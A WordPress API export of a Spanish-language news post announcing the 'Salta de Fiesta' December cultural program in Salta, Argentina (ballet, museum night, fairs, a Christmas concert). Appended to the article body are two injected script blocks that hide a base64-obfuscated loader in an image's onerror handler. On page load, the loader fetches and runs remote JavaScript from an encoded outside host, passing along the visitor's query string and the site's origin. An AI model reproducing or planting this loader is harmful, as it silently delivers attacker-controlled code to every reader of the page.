{"id":4660,"date":"2024-12-04T09:36:39","date_gmt":"2024-12-04T12:36:39","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4660"},"modified":"2025-08-13T23:44:03","modified_gmt":"2025-08-14T02:44:03","slug":"salta-de-fiesta-se-anuncio-el-ciclo-de-actividades-culturales-de-fin-de-ano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4660","title":{"rendered":"Salta de Fiesta: se anunci\u00f3 el ciclo de actividades culturales de fin de a\u00f1o"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-7547e8811ed0d7b9d09decdfbd250339\" style=\"background-color:#35292c\"><em>Durante diciembre se ofrecer\u00e1 una amplia agenda cultural con espect\u00e1culos de danza, m\u00fasica, proyecci\u00f3n de audiovisuales y exposiciones gratuitas.<\/em><\/h4>\n\n\n\n<p>La Secretar\u00eda de Cultura se prepara para vivir un diciembre cargado de actividades culturales bajo el ciclo \u00abSalta de Fiesta\u00bb. Durante todo el mes, se llevar\u00e1n a cabo espect\u00e1culos de danza y m\u00fasica, exposiciones de artesan\u00edas, proyecciones de audiovisuales y ferias que celebran el talento y el patrimonio local.<\/p>\n\n\n\n<p>El secretario de Cultura,<strong>&nbsp;Diego Ashur,<\/strong>&nbsp;resalt\u00f3 el esfuerzo articulado detr\u00e1s de este evento: \u00abtodos nuestros organismos y espacios culturales est\u00e1n comprometidos en dar lo mejor de s\u00ed para el p\u00fablico salte\u00f1o, su trabajo y profesionalismo. Este ciclo, que llevamos adelante desde hace m\u00e1s de dos a\u00f1os, es una forma de compartir lo m\u00e1s valioso de nuestra identidad cultural. Este a\u00f1o, adem\u00e1s de eventos tradicionales como la Noche de los Museos, ofrecemos experiencias \u00fanicas, como la presentaci\u00f3n de El Cascanueces y el Gran Concierto de Navidad, como as\u00ed tambi\u00e9n la integraci\u00f3n de 11 coros salte\u00f1os que llenar\u00e1n de m\u00fasica y alegr\u00eda nuestros espacios culturales el 14 de diciembre\u00bb.<\/p>\n\n\n\n<p>La subsecretaria de Patrimonio Cultural,&nbsp;<strong>Claudia Lamas<\/strong>, tambi\u00e9n expres\u00f3 su entusiasmo durante el anuncio: \u00abLa Noche de los Museos ser\u00e1 un momento \u00fanico, con m\u00e1s de 20 espacios culturales abiertos al p\u00fablico de manera gratuita y la participaci\u00f3n de coros que dar\u00e1n vida a los museos. Queremos que esta actividad, ya tan esperada por un amplio p\u00fablico, sea una verdadera fiesta para todos, salte\u00f1os y visitantes\u00bb.<\/p>\n\n\n\n<p>Las actividades dar\u00e1n inicio con la proyecci\u00f3n de cortometrajes del programa \u00abCine en Comunidad\u00bb el 10 de diciembre en el Auditorio Macacha G\u00fcemes en la Usina Cultural, Espa\u00f1a 1-98. Este programa refleja historias contadas por las propias comunidades locales como parte de una pol\u00edtica de fomento al desarrollo audiovisual.<\/p>\n\n\n\n<p>El ballet \u00abEl Cascanueces\u00bb, interpretado por el Ballet de la Provincia de Salta y acompa\u00f1ado por la Orquesta Sinf\u00f3nica, se presentar\u00e1 del 11 al 14 de diciembre en el Teatro Provincial Juan Carlos Saravia. Con un montaje que incluye a m\u00e1s de 100 artistas locales, las funciones ser\u00e1n gratuitas para estudiantes y jubilados, con un cupo limitado de 200 entradas por funci\u00f3n.<\/p>\n\n\n\n<p>La Noche de los Museos, el 14 de diciembre, ser\u00e1 un evento emblem\u00e1tico. Durante esa noche, los visitantes podr\u00e1n recorrer museos provinciales, municipales y privados mientras disfrutan de presentaciones corales de agrupaciones como Musicana, que celebra su 25\u00b0 aniversario, Renacer, Allegra y el Ensamble Coral Arsis, entre otros. Adem\u00e1s, en el Museo de Bellas Artes se inaugurar\u00e1 la ceremonia de premiaci\u00f3n del XLIV Sal\u00f3n de Artes Visuales, que incluye categor\u00edas como escultura, grabado, instalaciones y arte textil.<\/p>\n\n\n\n<p>Asimismo, desde el 11 de diciembre hasta el 7 de enero, la Feria Navidad Artesanal se desarrollar\u00e1 en la Casa de la Cultura, ofreciendo productos artesanales de alta calidad en horario de 9 a 20 horas. Paralelamente, la Feria de Dise\u00f1o en el Museo Casa Arias Rengel estar\u00e1 disponible desde el 14 de diciembre hasta el 5 de enero.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15115-salta-de-fiesta.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15115-salta-de-fiesta.webp\" alt=\"Salta de fiesta\"\/><\/a><\/figure>\n\n\n\n<p>El ciclo incluir\u00e1&nbsp;el 20 de diciembre con un gran concierto de Navidad a cargo de la Orquesta Sinf\u00f3nica de Salta y el Estudio Coral de Salta en el Teatro provincial. Con un repertorio de villancicos de todo el mundo, este espect\u00e1culo promete ser el&nbsp;broche de oro para un mes lleno de arte y cultura.<\/p>\n\n\n\n<p>Finalmente, el 21 de diciembre se estrenar\u00e1 la obra del Laboratorio Creativo por la Memoria en La Caldera. La misma contar\u00e1 con la participaci\u00f3n del elenco ganador del municipio integrado por&nbsp; Rosalyn Ru\u00edz, Gast\u00f3n I\u00f1iguez, Victoria Jaffe, Leandro Pereyra y Julieta Colina, con el acompa\u00f1amiento de Mar\u00eda Morales Miy. En tanto, en Embarcaci\u00f3n tendr\u00e1 lugar la presentaci\u00f3n del elenco ganador integrado por los m\u00fasicos Vicente Pulita y Rolando Torres junto a los directores de la Academia Esencia Norte\u00f1a, Exequiel Rojas y Milagros Tolaba con el acompa\u00f1amiento de Carolina Bustillos. Cabe destacar que esta actividad se realiz\u00f3 en articulaci\u00f3n con la Comisi\u00f3n Provincial por la Memoria, la Secretar\u00eda de Derechos Humanos, la Municipalidad de Embarcaci\u00f3n y la Municipalidad de La Caldera.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Salta de Fiesta: se anunci\u00f3 el ciclo de actividades culturales de fin de a\u00f1o\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/MW4rtkzhvrI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Durante diciembre se ofrecer\u00e1 una amplia agenda cultural con espect\u00e1culos de danza, m\u00fasica, proyecci\u00f3n de audiovisuales y exposiciones gratuitas. La Secretar\u00eda de Cultura se prepara para vivir un diciembre cargado de actividades culturales bajo el ciclo \u00abSalta de Fiesta\u00bb. Durante todo el mes, se llevar\u00e1n a cabo espect\u00e1culos de danza y m\u00fasica, exposiciones de artesan\u00edas, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4661,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4660","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4660"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4660"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4660\/revisions"}],"predecessor-version":[{"id":6618,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4660\/revisions\/6618"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4661"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}